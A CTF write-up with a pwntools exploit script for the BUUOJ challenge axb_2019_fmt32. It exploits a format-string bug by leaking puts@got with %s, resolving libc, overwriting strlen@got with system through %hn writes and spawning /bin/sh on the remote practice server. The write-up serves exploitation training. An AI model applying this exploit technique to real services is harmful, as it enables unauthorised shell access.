很奇怪，one_gadget 用不出来
格式化字符串漏洞，然后修改 GOT 表
1. 通过 %s 泄露 GOT 表内容
2. 利用 %n 修改地址内容
# Writeup script for the BUUOJ challenge axb_2019_fmt32 (format-string bug).
# Flow: (1) leak a GOT entry with "%s", (2) resolve libc with LibcSearcher,
# (3) overwrite a GOT entry with two "%hn" writes, (4) send a final input.
# NOTE(review): the payloads concatenate str with the bytes returned by p32(),
# i.e. this is Python 2 pwntools style — confirm the interpreter version.
# NOTE(review): the GOT overwrite presupposes a writable GOT (no Full RELRO)
# and a printf not hardened against "%n"; checksec output is not shown here.
from pwn import*
from LibcSearcher import*
context.log_level = 'debug'
io = remote("node4.buuoj.cn",26020)
#io = process('./axb_2019_fmt32')
elf = ELF('./axb_2019_fmt32')
#gdb.attach(io,'b*0x0804874A')
puts_got = elf.got['puts']
strlen_got = elf.got['strlen']
io.recvuntil("Please tell me:")
# Step 1: put puts@got into the buffer and read it back through "%8$s".
payload = 'a'+p32(puts_got)+'abcd'+"%8$s"
io.send(payload)
io.recvuntil('abcd')
puts_addr=u32(io.recv(4))
log.success("puts:"+hex(puts_addr))
# Step 2: derive the libc base and symbol addresses from the leaked puts address.
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base +libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')  # computed but not used below
print('system:'+hex(system_addr))
# The target address is split into two 16-bit halves, each written with %hn.
sys_high = (system_addr>>16)&0xffff
sys_low = system_addr&0xffff
io.recvuntil("Please tell me:")
# Step 3: overwrite strlen@got — low half through argument 8, high half through argument 9.
payload = 'a'+p32(strlen_got)+p32(strlen_got+2)+'%'+str(sys_low-18)+'c%8$hn'+'%'+str(sys_high-sys_low)+'c%9$hn'
# Note: the second write uses positional argument 9.
# sys_low-18: %n counts the bytes already printed, so the padding is reduced by that amount.
# Writing all four bytes in one go did not seem to work; unsure whether that was a mistake.
# Overwriting with one_gadget did not work either; possibly also a mistake.
io.sendline(payload)
io.recvuntil("Please tell me:")
# Step 4: final input, then hand the session over to the user.
io.sendline(';/bin/sh\x00')
io.interactive()
